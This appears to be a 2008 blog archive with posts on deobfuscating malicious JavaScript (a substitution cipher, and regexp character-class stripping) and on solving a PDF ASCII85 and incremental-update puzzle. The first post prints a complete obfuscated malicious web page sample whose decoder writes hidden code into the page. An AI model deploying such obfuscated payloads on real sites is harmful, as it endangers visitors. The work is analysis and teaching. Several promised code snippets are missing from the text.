May 2008


Malicious JavaScript is often encrypted, sometimes with commercial tools but most of the time with home-made tricks. Is it really necessary? I mean: if you want to protect your page, do you really need an encryption tool?

I think the answer is no: it’s a useless waste of time (and sometimes money). Most of the time an automatic decoder can show the original code in a few milliseconds, and when it fails you can use your brain; it’s not as fast, but it will solve the puzzle for sure.
Even if you manage to fool one or more automatic decoders, it doesn’t mean you have protected your script from unwanted eyes.

A simple proof is given by a piece of code I found at EvilCry’s blog. The code I’m referring to is:

<html><head><Meta Name=Encoder Content=HTMLSHIP>
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<noscript><iframe></iframe></noscript>
<script language="javascript">
<!--
jL0="0ucoc\\MIM",yU90="Iu\{\{\{\%\%ovf0N";0.1261199,nB73="0.7082915",yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';function lW4(uO49){"0u\%N\{\{I\{\\",l=uO49.length;'0k\+IBI\r0c',w='';while(l--)"0ucooc\;\{\{",o=jL0.indexOf(uO49.charAt(l)),'\~k\)0\~cc\+YX0c',w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;"0uoN0M\%\{\{",jL0=jL0.substring(1)+jL0.charAt(0),document.write(w);'0kZ\r\)Z\r\r\|'};lW4("2nW\(m\!L\`yD\<b\|Db\^\rJDiDnW\(m\!L\$\)l8t\r8\]\]U\;mV\ P\-W\|S\^\<LdDyy\?9V\|\<WLm\-\<\`XPS\ \?9\(\^L\|\(\<\`VDyn\^\@\;V\|\<WLm\-\<\`XSPS\ \?9P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\rXPS\;n\^L\>mS\^\-\|L\ KXSPS\ \?Ke\]xx\?\@\;XSPS\ \?\;\@P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\r\<\^\)\`w\|\<WLm\-\<\ K\(\^L\|\(\<\`VDyn\^K\?\;V\|\<WLm\-\<\`X\<PS\ \^\?9mV\ P\-W\|S\^\<LdyDo\^\(n\"\"\)m\<P\-\)dnmP\^\{D\(\?9mV\ \^d\)\}mW\}R\rU\?\(\^L\|\(\<\`VDyn\^\;\@\@\;mV\ P\-W\|S\^\<LdyDo\^\(n\?9P\-W\|S\^\<LdWD\!L\|\(\^\:i\^\<Ln\ \:i\^\<Ld3fr\*\:Mf4H\?\;P\-W\|S\^\<Ld\-\<S\-\|n\^P\-\)\<\rX\<PS\;\@\^yn\^9P\-W\|S\^\<Ld\-\<S\-\|n\^\|\!\rX\<PS\;\@\;S1Ux\rtEN\=\;\{fGE\r6EN8\;V\|\<WLm\-\<\`XP\)n\ \?9\)m\<P\-\)dnLDL\|n\`\r\`K\`K\;n\^L\>mS\^\-\|L\ KXP\)n\ \?KeUxx\?\;\@\;XP\)n\ \?\;mM\]N\r6xtU\;m48E\r\=8E8\;V\|\<WLm\-\<\`XPPn\ \?9mV\ P\-W\|S\^\<LdDyy\?9P\-W\|S\^\<Ld\-\<n\^y\^WLnLD\(L\rV\|\<WLm\-\<\`\ \?9\(\^L\|\(\<\`VDyn\^\@\;n\^L\>mS\^\-\|L\ KXPPn\ \?KeGxx\?\@\@\;XPPn\ \?\;b\+E\r8ENG\;mHUG\rNG\=G\;jltt\rtEN6\;yMGx\r\=G\=6\;p1tN\r8\]G\]\;jfN8\r\]\]\]x\;\~kx\rUG\=\]\;\;XymW\^\<n\^PXL\-X\rKF\^L\^\(\`\nDyyK\;2AnW\(m\!L\$")
//-->
</script>
<ScrIPt lANGUAGE=jAVASCRiPt>
lW4("MGN\#\%tCJYS\?d\ \'SJ\@\`\:8\%SDXwwr\r\%wwNtNSKit6\:S\~k0St\!fQ\n\,d\,3Qf\'wwY2DSD\?ddH\>wwAAAkA\rk3\!\[wtswz\?d\ \'\~wNtNwz\?d\ \'\~Xd\!fQ\n\,d\,3Qf\'kWdWDO\=m\=mMGXXS\%\!pfdpWS3QSoH\!Sc\+qSc00\|SI\>c0\>0cSJ6SXXO\=m\=mM\?d\ \'O\=mSSSM\?pfWO\=mSSSSSSMd\,d\'pO\=mSSSSSSSSS\=mSSSSSSMwd\,d\'pO\=mSSSSSSM\ pdfSQf\ pRDxY2Ysot\#sDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSSSSM\ pdfSQf\ pRD\$\#s6ottYsDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSMw\?pfWO\=m\=mSSSMg3WlSg\[43\'3\!RDP\-\-\-\-\-\-DSdpzdRDP000000DS\'\,QjRDP0000\-\-DSE\'\,QjRDPI000I0DSf\'\,QjRDP\-\-0000DO\=m\=mSM4pQdp\!OMgOJ\'pf\npS\!pH3\!dSfQlS\np\!E\,4pSE\,3\'fd\,3Q\nSd3\>SMoS\?\!p\-RD\ f\,\'d3\>fg\.\npv4Hf\n\?\,p\'Wk43\ DOfg\.\npv4Hf\n\?\,p\'Wk43\ MwgOMwfOMw4pQdp\!O\=m\=mSSSMwg3WlO\=mMw\?d\ \'O\=m")
</script>
</head><body><noscript><b>
<font color=red>This page requires a javascript enabled browser!!!</font></b></noscript>
</body></html>

Quite awful indeed. I wanted to see the script code and, as always, I started with some automatic decoders. The first script was easily decoded, but not the second one. I tried combining the two scripts into one without luck (it should work but I failed, don't know why...). The few decoders I tried didn't give me a good result. I didn't search the net for more decoders; I decided to figure it out myself.

The second script starts with lW4("MGN and ends with O\=m"). It looks like an ordinary call, where lW4 is the name of the function and the very long string between the quotes is its parameter. To confirm this idea I need to find the function inside the first script. Here's the search result: lW4(uO49){
I'm on the right track: the line above looks very much like the first part of a function declaration. It's time to make the first script as readable as I can.

The script contains redundant assignments (jL0 and yU90 are each assigned twice, so you can remove the first assignment of each), useless variables (nB73 is never used) and useless expressions (you can remove strings like "0u\%N\{\{I\{\\" and the number 0.1261199). It's pretty easy to remove them; the result I got is shown below:

yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',
jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';

function lW4(uO49)
{
	l=uO49.length;
	w='';
	while(l--)
		o=jL0.indexOf(uO49.charAt(l)),
		w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;
	jL0=jL0.substring(1)+jL0.charAt(0),
	document.write(w);
};
lW4("2nW...");
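To make the mechanism easier to see, here is a minimal sketch of the same routine with readable names. It returns the decoded text instead of writing it to the page, so nothing gets executed. The names makeDecoder, cipherAlphabet and plainAlphabet are mine, and the three-character alphabets are toy values chosen for illustration, not the ones from the sample.

```javascript
// Sketch of the lW4 logic: a substitution cipher whose key rotates after each call.
// cipherAlphabet plays the role of jL0, plainAlphabet the role of yU90.
function makeDecoder(cipherAlphabet, plainAlphabet) {
  let key = cipherAlphabet;
  return function decode(encoded) {
    let out = '';
    // Walk the input from the last character to the first, like while(l--) does.
    for (let i = encoded.length - 1; i >= 0; i--) {
      const ch = encoded.charAt(i);
      const pos = key.indexOf(ch);
      // Characters missing from the key are copied unchanged.
      out = (pos === -1 ? ch : plainAlphabet.charAt(pos)) + out;
    }
    // Rotate the key by one position, as jL0.substring(1) + jL0.charAt(0) does.
    key = key.substring(1) + key.charAt(0);
    return out;
  };
}

// Toy alphabets (hypothetical): a->x, b->y, c->z on the first call.
const decode = makeDecoder('abc', 'xyz');
console.log(decode('abc!')); // xyz!
console.log(decode('abc!')); // zxy!  (the key is now "bca")
```

The key is rotated by one position after every call, which is why the second call decodes the same input differently, and why the two lW4 calls in the page have to be decoded in their original order.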

Two strings, a function and a call to the function. Puzzle solved!
The scripts are used to decrypt two pieces of code; to see them I inserted an alert(w) instruction right after document.write(w). It’s the fastest way to see the code. If you read EvilCry’s post you already know the content of the first decrypted code; the other one is:

Just yesterday I had the opportunity to take a look at a kind of obfuscated JavaScript code I had never seen before. The script contains a class named KyD defined using the prototype pattern. The code is something like this:

function KyD() {};

KyD.prototype = {
install : function()
{
...
},
cookieName:'feadcbhg',
getFrameURL : function()
{
...
},
...
};

var o44o=new KyD();
o44o.install();

More or less a standard class declaration. The constructor is empty; it doesn’t need any special initialization. Right after the class definition there are two more lines: a new KyD object is created and its “install” method is called.

For me it’s quite uncommon to see a class declaration inside a malicious script; I’m used to seeing JavaScript code written in a procedural style. Anyway, this is not a problem of course. The problem arises when looking at the declared methods. It’s often easy to understand a JavaScript function from its source code, but not this time. Look at this snippet taken from one of the methods declared inside the KyD class:

Are you able to tell me the content of “o” in a few seconds? Even if you know how to handle s you’ll need more than a few seconds to solve the puzzle.
How do you sort out the real meaning of the string? The script has been obfuscated using regular expressions; nothing impossible, but if you want to identify the content of the string s you need to know something about regexps.

How can regexp be used to obfuscate a string?
The string s is composed of 3 parts: two of them are obfuscated substrings, while the other one is obtained from getFrameURL, another method of the KyD class.
The substrings have a replace method applied; in this specific case the method is used to search for and replace characters in the string using regular expressions. The method is normally used to replace some characters with some other characters in a string:

stringObject.replace(findstring,newstring)

Here is how to use the method:

var s = "Say Hello";
document.write(s.replace(/Hello/, 'Ciao'));

The output will be “Say Ciao”, pretty easy. It’s also possible to add flags to the regular expression, e.g.:
- i: used to perform a case insensitive search
- g: used to perform a global search over the entire string.
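A quick way to see what the two flags change is to run the same replacement with and without them. This is only a small sketch; the sample sentence and the variable names are mine.

```javascript
// Sample text made up for the demonstration.
const text = 'Say Hello, hello, HELLO';

// No flags: only the first exact match is replaced.
const firstOnly = text.replace(/Hello/, 'Ciao');

// g only: every exact (case-sensitive) match of "hello" is replaced.
const globalOnly = text.replace(/hello/g, 'Ciao');

// g and i together: every match is replaced, whatever its case.
const globalIgnoreCase = text.replace(/hello/gi, 'Ciao');

console.log(firstOnly);        // Say Ciao, hello, HELLO
console.log(globalOnly);       // Say Hello, Ciao, HELLO
console.log(globalIgnoreCase); // Say Ciao, Ciao, Ciao
```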

Back to our snippet. Looking at the first substring you’ll see that the replace method is used in this way:

replace(/[%\)@QI]/g, '')

The g flag is present and the new string is empty, which means that part of the string will be cut away. Which part? The string to find is defined as a regular expression: the square brackets (‘[' and ']‘) define a character class, so every occurrence of any character listed inside them (%, ), @, Q and I) is replaced with the empty string. Removing those characters from the substring you’ll obtain the de-obfuscated substring:

Now I can decode all the strings obtaining the original script!
Quite a nice trick. It forces you to spend some more time over a script, nothing more. Thanks to Bobby for the script.
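If you want to play with the trick, here is a minimal sketch that uses the same character class on a string I made up. The obfuscated value and the stripJunk helper are hypothetical and are not taken from the KyD script; the only assumption is that the junk characters never appear in the real text.

```javascript
// Remove every character that belongs to the junk class used in the snippet.
function stripJunk(obfuscated) {
  return obfuscated.replace(/[%\)@QI]/g, '');
}

// Made-up example: the junk characters %, ), @, Q and I are scattered
// inside a harmless URL.
const hidden = 'ht%tp:)//ex@amQple.Ico%m/';
console.log(stripJunk(hidden)); // http://example.com/
```

The same idea works in the other direction: to obfuscate a string you only have to sprinkle it with characters that the original text never uses.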

There was a challenge today at Didier Stevens’s blog. It’s a PDF puzzle; the goal is to find out the passphrase hidden inside the file.

Opening the file with a pdf reader you’ll see the text:
“The passphrase is XXXXXXXXXXXXXXXXXXX”.
The passphrase is certainly not a sequence of ‘X’. How do you find it?

Didier gave us a little hint: “There’s a very simple solution just requiring Notepad”. Opening the file with Notepad reveals the complete structure of the PDF file. The phrase is not visible in plain text inside the file; after a closer look I noticed these lines:
5 0 obj
...
/Filter /ASCII85Decode
...
stream
6<#'\7PQ#@1a#b...

This is the definition of an object; as you can see, its stream is encoded using ASCII85. Using a decoder it’s pretty easy to retrieve the required passphrase: “Incremental Updates”.
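If you don't have a decoder at hand, ASCII85 is simple enough to decode by hand: every group of 5 characters is a base-85 number that holds 4 bytes. Below is a minimal sketch of a decoder; the function name ascii85Decode is mine, and the test string is the classic "Man " example, not the stream from the challenge (which is truncated above).

```javascript
// Minimal ASCII85 decoder sketch: 5 characters ('!'..'u') become 4 bytes.
function ascii85Decode(text) {
  const bytes = [];
  let group = [];

  // Turn 5 base-85 digits into 4 bytes and keep the first `count` of them.
  function flush(digits, count) {
    let value = 0;
    for (const d of digits) value = value * 85 + d;
    const four = [
      Math.floor(value / 16777216) % 256,
      Math.floor(value / 65536) % 256,
      Math.floor(value / 256) % 256,
      value % 256,
    ];
    for (let i = 0; i < count; i++) bytes.push(four[i]);
  }

  for (const ch of text) {
    if (ch === '~') break;            // "~>" marks the end of the data
    if (/\s/.test(ch)) continue;      // whitespace is ignored
    if (ch === 'z' && group.length === 0) {
      bytes.push(0, 0, 0, 0);         // 'z' is shorthand for four zero bytes
      continue;
    }
    const digit = ch.charCodeAt(0) - 33;
    if (digit < 0 || digit > 84) throw new Error('invalid ASCII85 character: ' + ch);
    group.push(digit);
    if (group.length === 5) {
      flush(group, 4);
      group = [];
    }
  }

  // A final partial group of n characters is padded with 'u' and yields n-1 bytes.
  if (group.length > 1) {
    const n = group.length;
    while (group.length < 5) group.push(84);
    flush(group, n - 1);
  }
  return String.fromCharCode(...bytes);
}

console.log(JSON.stringify(ascii85Decode('9jqo^~>'))); // "Man "
```

The result of decoding a PDF content stream is not just the text: it also contains the drawing operators around it, so expect to read the passphrase in the middle of some other instructions.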

Is it really necessary to use an ASCII85 decoder?
There are in fact two suspicious snippets inside the file; the first is the one you see above, and the other one is:
5 0 obj
...
/Filter /ASCII85Decode
...
stream
6<#'\7PQ#@1a#b...

The two objects are almost identical: only a few bytes differ in the encoded strings. The first and the last parts of the encoded strings are the same, which means they use the same operators; e.g. if the objects are used to display a text string, they can have the same coordinates.

OK, I have two streams but only one will be shown. What decides which one is displayed?
A PDF file contains a cross-reference table which lists the byte offset of every object inside the file. A table looks something like this:

xref
0 7
0000000000 65535 f
0000000012 00000 n
0000000089 00000 n
0000000145 00000 n
0000000214 00000 n
0000000419 00000 n
0000000594 00000 n

There are 7 entries defined. Checking each object offset (the number in the first column) you’ll find out that only one of the two streams is referenced. The other one is not listed in this table because there’s another cross-reference table at the end of the file:

xref
0 1
0000000000 65535 f
5 1
0000000935 00000 n
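To check which offset wins for each object, the two tables can be merged in file order, letting later entries override earlier ones. Here is a rough sketch that does it with the two tables shown above; parseXref and mergeXref are names I picked, and the parser only handles the classic text format of the table.

```javascript
// Parse one classic "xref" section into a Map: object number -> entry.
function parseXref(section) {
  const lines = section.trim().split(/\r?\n/).map((line) => line.trim());
  const table = new Map();
  let i = lines[0] === 'xref' ? 1 : 0;
  while (i < lines.length) {
    // Subsection header: first object number and number of entries.
    const [first, count] = lines[i].split(/\s+/).map(Number);
    i++;
    for (let k = 0; k < count; k++, i++) {
      const [offset, generation, kind] = lines[i].split(/\s+/);
      table.set(first + k, {
        offset: Number(offset),
        generation: Number(generation),
        inUse: kind === 'n',
      });
    }
  }
  return table;
}

// Merge the sections in file order: a later entry replaces an earlier one.
function mergeXref(sections) {
  const merged = new Map();
  for (const section of sections) {
    for (const [objectNumber, entry] of parseXref(section)) {
      merged.set(objectNumber, entry);
    }
  }
  return merged;
}

const originalTable = `xref
0 7
0000000000 65535 f
0000000012 00000 n
0000000089 00000 n
0000000145 00000 n
0000000214 00000 n
0000000419 00000 n
0000000594 00000 n`;

const updateTable = `xref
0 1
0000000000 65535 f
5 1
0000000935 00000 n`;

console.log(parseXref(originalTable).get(5).offset);            // 419
console.log(mergeXref([originalTable, updateTable]).get(5).offset); // 935
```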

It’s pretty obvious now: the second table redefines object 5, so the second stream (the text with the X’s) replaces the first one (the text with the passphrase) when the file is displayed.
To see the right text I removed some bytes from the end of the file. You can remove all the bytes after the first “%%EOF” occurrence.
Now you can see the hidden passphrase without using an ascii85 decoder. Nice challenge!
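The cut can also be done with a few lines of code instead of an editor. This is just a sketch: stripIncrementalUpdates is my own name, and it assumes the file content has been read into a string one byte per character (in Node, for example, with fs.readFileSync(path, 'latin1')). The sample string below is a made-up skeleton, not the challenge file.

```javascript
// Keep everything up to and including the first "%%EOF" marker,
// dropping any incremental update appended after it.
function stripIncrementalUpdates(pdfText) {
  const marker = '%%EOF';
  const end = pdfText.indexOf(marker);
  if (end === -1) return pdfText; // no marker found: leave the content alone
  return pdfText.slice(0, end + marker.length) + '\n';
}

// Made-up skeleton of a file with one incremental update.
const sample =
  '%PDF-1.1\n(original body)\nxref\n(first table)\n%%EOF\n' +
  '(updated object)\nxref\n(second table)\n%%EOF\n';

console.log(stripIncrementalUpdates(sample));
```

Working on a copy is a good idea, so the original challenge file stays intact for comparison.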

Lunch break ends now…